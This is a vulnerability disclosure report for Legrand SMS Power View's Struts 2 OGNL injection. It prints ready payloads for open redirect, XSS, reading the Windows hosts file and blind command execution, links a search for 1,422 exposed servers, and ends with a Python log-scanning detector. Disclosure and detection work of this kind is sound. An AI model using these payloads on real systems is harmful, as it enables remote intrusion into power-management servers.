| Title | Legrand SMS Power View 1.x.x OS Command Injection |
|---|
| Description | Vulnerability Report: OGNL Injection in SMS Power View
The SMS Power View system enables local and remote UPS management via TCP/IP and the internet.
During OGNL Injection exploitation attempts, it was identified that all servers running this system use a vulnerable version of Apache Struts 2 in their codebase. This allowed the exploitation of OGNL Injection, leading to the following vulnerabilities:
Open Redirect
Cross-Site Scripting (XSS)
Local File Inclusion (LFI)
OS Command Injection
A global search revealed 1,422 servers running SMS Power View, all of which are potentially vulnerable. (Search performed via FOFA: https://en.fofa.info/result?qbase64=dGl0bGU9IlNNUyBQb3dlciBWaWV3Ig%3D%3D&page=1&page_size=10)
Exploitation Details
Open Redirect
Allows attackers to redirect users to malicious websites, facilitating phishing campaigns.
Payload:
http://x.x.x.x:9191/?redirect:https://www.google.com
Cross-Site Scripting (XSS)
Enables attackers to inject and execute malicious JavaScript in users' browsers.
Payload:
http://x.x.x.x:9191/?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23webroot%3d%23req.getSession().getServletContext().getRealPath(%27/%27),%23resp%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23resp.print(%27%3cscript%3ealert(%22Fr1t0%22)%3c%2fscript%3e%20%27),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()}
Local File Inclusion (LFI)
Enables unauthorized access to sensitive system files.
Payload:
http://x.x.x.x:9191/?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23file%3dnew+java.io.File(%27C:\\Windows\\System32\\drivers\\etc\\hosts%27),%23scanner%3dnew+java.util.Scanner(%23file),%23data%3d%23scanner.useDelimiter(%27\\A%27).next(),%23resp%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23resp.println(%23data),%23resp.flush(),%23resp.close()}
Blind OS Command Injection
Allows attackers to execute arbitrary system commands remotely.
Payload:
http://x.x.x.x:9191/?redirect%3a%24%7b%23cmd%3d'whoami%20%3e%20C%3a%5c%5cWindows%5c%5cTemp%5c%5coutput.txt'%2c%23proc%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String%5b%5d%7b'cmd.exe'%2c'%2fc'%2c%23cmd%7d).start()%2c%23proc.waitFor()%7d
Since the command output is not returned directly in the request, it is necessary to write the execution result to a .txt file in the Temp directory. The output can then be retrieved using LFI:
Retrieve Execution Output:
http://x.x.x.x:9191/?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23file%3dnew+java.io.File(%27C:/Windows/Temp/output.txt%27),%23scanner%3dnew+java.util.Scanner(%23file),%23data%3d%23scanner.useDelimiter(%27\\A%27).next(),%23resp%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23resp.println(%23data),%23resp.flush(),%23resp.close()} |
|---|
| Source | ⚠️ http://x.x.x.x:9191/?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23file%3dnew+java.io.File(%27C:/Windows/Temp/output.txt%27),%23scanner%3dnew+java.util.Scanner(%23file),%23data%3d%23scanner.useDeli |
|---|
| User | Fr1t0 (UID 82967) |
|---|
| Submission | 03/19/2025 20:54 (1 Year ago) |
|---|
| Moderation | 03/30/2025 09:58 (11 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 302032 [Legrand SMS PowerView 1.x redirect] |
|---|
| Points | 20 |
|---|
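
Every request in the report carries the `redirect:` parameter prefix, sometimes with the colon and `${` percent-encoded, so a log check has to decode before matching. The following detection sketch is an added example, not part of the submission or of any vendor tooling. The log lines are constructed, and the `redirectAction:` and `action:` prefixes are an assumption that goes beyond the single prefix the report shows.

```python
import re
from urllib.parse import unquote

# Only "redirect:" appears in the report. "redirectAction:" and "action:" are
# included as an assumption that the same Struts 2 prefix handling is exposed.
PREFIXES = ("redirect:", "redirectAction:", "action:")
OGNL_OPEN = re.compile(r"[$%]\{")  # start of a ${...} or %{...} expression
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def full_decode(text, max_rounds=3):
    """Percent-decode until stable so encoded variants are normalized."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(target):
    """Return 'ognl-expression', 'prefix-only' or None for a request target."""
    _, _, query = target.partition("?")
    verdict = None
    for raw_param in query.split("&"):
        param = full_decode(raw_param)
        for prefix in PREFIXES:
            if param.startswith(prefix):
                if OGNL_OPEN.search(param[len(prefix):]):
                    return "ognl-expression"
                verdict = "prefix-only"  # e.g. the open-redirect form
    return verdict

def scan(log_lines):
    """Return (client_ip, verdict) for every access-log line that matches."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((line.split()[0], verdict))
    return hits

# Constructed access-log lines (documentation IP ranges, harmless expressions).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Mar/2025:20:50:01 +0000] "GET /index.action?page=1&redirectTo=home HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Mar/2025:20:51:13 +0000] "GET /?redirect:https://example.com HTTP/1.1" 302 0',
    '198.51.100.7 - - [19/Mar/2025:20:52:40 +0000] "GET /?redirect:${1%2b1} HTTP/1.1" 200 4',
    '198.51.100.7 - - [19/Mar/2025:20:53:02 +0000] "GET /?redirect%3a%24%7b1%2b1%7d HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

A `prefix-only` hit corresponds to the open-redirect form, while `ognl-expression` covers the forms behind the XSS, file-read and command-execution findings.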